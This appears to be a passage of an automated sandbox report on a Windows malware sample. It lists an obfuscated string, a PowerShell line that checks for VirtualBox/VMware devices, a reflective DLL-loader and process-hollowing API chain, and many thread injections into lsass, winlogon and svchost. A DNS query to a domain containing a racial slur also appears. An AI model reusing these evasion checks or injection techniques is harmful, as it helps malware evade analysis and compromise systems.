vXdZacIamBlaxNTRdneqMzJAsJwCfHefAjPiAnbsSySxNdgOWEEbmtAWnD%s%GqGfUFwgAoXLrPlLyoGlMoDHGBccSgJTUWGKMNEnbGDSQlmPQAVmpcQsNZzs%*%CtouEeQuiAZLJtkfLKQupnmrkwESfoWNolKHsinMvRGpBkCVRLHdiedohXjh%t%zXpUDmxyICMCwdZxHWPaUJauGTEjiwAvZfnxCLLoMempYfGefGHkhinQWUnJ%*%InpmbrDqQBUVlBnPwLwBnzeCPqoQSwAHybGzOZnHCpoDLLZFUxtlyMwijNxL%e%cMytamxjUOawyPZYlAQdrIVudpjLFypbCCEPQUCyoQLfwWNJMyWIWutuRdqL%*%dLDvzZUVkjhqXsOBWPYgBzYgBGfiijYNEQvDmpGxcRyDrFKEFRxbfkkDMwUS%m%TLMbltMhWlpHjAdJbvPVVACrMWIuGRRPvNDrfxrXTDHuCQSEgACqGYWtivoo%*%LsAetzlvXMEDeScsTiOWedngpAixRkiJiclAdCadExHuVYmOVEzaHskIftPT%.%qNEMEVubGCoqiLrHwTlrouCmKicQSDvKNhNRSUPZDkitpiRWaCmlhxEWlrbw%*%SEicgEDaXAOBdlOdljWCqgPprjCpCQFBSthYcgmLEQYAOKiVJALcuzfMOSLW%I%bnygUmIJePbeWlXzipBGbGGcfDhtnukjvpJrsRFBcyRTyGfiBGEyreVvGwbr%*%fpwJESJGBGgqKaECPNDzxYRGQMSquoKWQovMcipGWzHVAnOqzsFTTBThxPSS%O%atmnVkAvERAHxWDYrVgDXBQbIRdpunpnpwGDmtapMsMHSYvWXVQBIoUzClEe%"
Source: cmd.exe, 0000000F.00000003.2027664001.000002512A75D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" :
Source: svchost.exe, 0000001A.00000000.2118976319.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000E.00000002.2338111026.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_8-616
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_8-702
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC641E3C LoadLibraryA,GetProcAddress,SleepEx,9_2_00000225DC641E3C
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,8_2_0000000140001CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC67CD80
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000225DC6A8814
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6A84B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6ACD80
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000202C0AECD80
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_000002A661308814
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAED9CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002BAAED98814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAED984B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE0CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002BAAEE08814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE084B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE6CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002BAAEE68814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE684B0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000002512A6E8814
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002512A6E84B0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002512A6ECD80
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001BEB0A384B0
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000001BEB0A38814
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001BEB0A3CD80
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0000026A879C84B0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0000026A879C8814
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0000026A879CCD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537ACD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537A84B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00000179537A8814
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537DCD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537D84B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00000179537D8814
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002295D56CD80
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000002295D568814
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002295D5684B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306E684B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0000025306E68814
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306E6CD80
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306EC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306EC84B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306EC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0000025306EC8814
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306ECCD80
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_000001845B3C8814
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001845B3C84B0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001845B3CCD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001ADECD484B0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_000001ADECD48814
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001ADECD4CD80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590784B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D559078814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001D559078814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D55907CD80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590A84B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001D5590A8814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590ACD80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590D84B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001D5590D8814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590DCD80
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00000241A9EA8814
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00000241A9EACD80
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00000241A9EA84B0
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD73198814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_000001CD73198814
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CD7319CD80
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD731984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CD731984B0
Source: C:\Windows\$nya-onimai2\IfMUlU.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\svchost.exeDomain query: iam.nigga.dad
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 28.2.powershell.exe.253a5db0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,8_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AF192EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B392EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3F72EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A4152EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDF32EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C0262EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C9F32EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 645B2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7B2A2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4F62EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AEDD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AEE32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B8D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13EF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72EBC
